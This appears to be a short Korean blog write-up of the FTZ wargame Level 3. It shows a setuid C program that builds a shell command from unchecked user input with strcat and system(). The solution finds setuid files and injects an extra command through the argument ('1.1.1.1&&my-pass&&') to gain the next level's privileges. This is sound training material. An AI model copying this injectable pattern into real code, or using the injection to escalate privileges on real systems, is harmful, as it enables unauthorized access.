[FTZ] Level3 ํ’€์ด

์ตœ๋Œ€ 1 ๋ถ„ ์†Œ์š”

๐Ÿ’ก FTZ Level3 ํ’€์ด

๋ฌธ์ œ

๊ณ„์ • : level3/can you fly?

hint

๋‹ค์Œ ์ฝ”๋“œ๋Š” autodig์˜ ์†Œ์Šค์ด๋‹ค.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char **argv){

    char cmd[100];

    if( argc!=2 ){
        printf( "Auto Digger Version 0.9\n" );
        printf( "Usage : %s host\n", argv[0] );
        exit(0);
    }

    strcpy( cmd, "dig @" );
    strcat( cmd, argv[1] );
    strcat( cmd, " version.bind chaos txt");

    system( cmd );

}

์ด๋ฅผ ์ด์šฉํ•˜์—ฌ level4์˜ ๊ถŒํ•œ์„ ์–ป์–ด๋ผ.

more hints.
- ๋™์‹œ์— ์—ฌ๋Ÿฌ ๋ช…๋ น์–ด๋ฅผ ์‚ฌ์šฉํ•˜๋ ค๋ฉด?
- ๋ฌธ์ž์—ด ํ˜•ํƒœ๋กœ ๋ช…๋ น์–ด๋ฅผ ์ „๋‹ฌํ•˜๋ ค๋ฉด?


ํ’€์ด

setuid๊ฐ€ ๊ฑธ๋ฆฐ ํŒŒ์ผ์„ ์ฐพ์•„ ์ค๋‹ˆ๋‹ค.

find / -perm -4000 -user level4 2>/dev/null

image

ํžŒํŠธ์— ๋‚˜์™€์žˆ๋Š” ์ฝ”๋“œ๋ฅผ ๋ถ„์„ํ•˜๋ฉด, ์‚ฌ์šฉ์ž์˜ ์ž…๋ ฅ๊ฐ’์œผ๋กœ ๋‹ค์Œ๊ณผ ๊ฐ™์ด cmd ๋ฌธ์ž์—ด์ด ์™„์„ฑ๋ฉ๋‹ˆ๋‹ค.

dig @[์ž…๋ ฅ ๊ฐ’] version.bind chaos txt

์ž…๋ ฅ ๊ฐ’์— ๋‹ค์Œ๊ณผ ๊ฐ™์ด ์ž‘์„ฑํ•˜์—ฌ ๋ช…๋ น์–ด๊ฐ€ ์—ฌ๋Ÿฌ๊ฐœ์˜ ๋ช…๋ น์–ด๊ฐ€ ์ˆ˜ํ–‰๋˜๋„๋ก ํ•ด์ค๋‹ˆ๋‹ค.

์ž…๋ ฅ ๊ฐ’

/bin/autodig  '1.1.1.1&&my-pass&&'

image

ํƒœ๊ทธ:

์นดํ…Œ๊ณ ๋ฆฌ:

์—…๋ฐ์ดํŠธ:

๋Œ“๊ธ€๋‚จ๊ธฐ๊ธฐ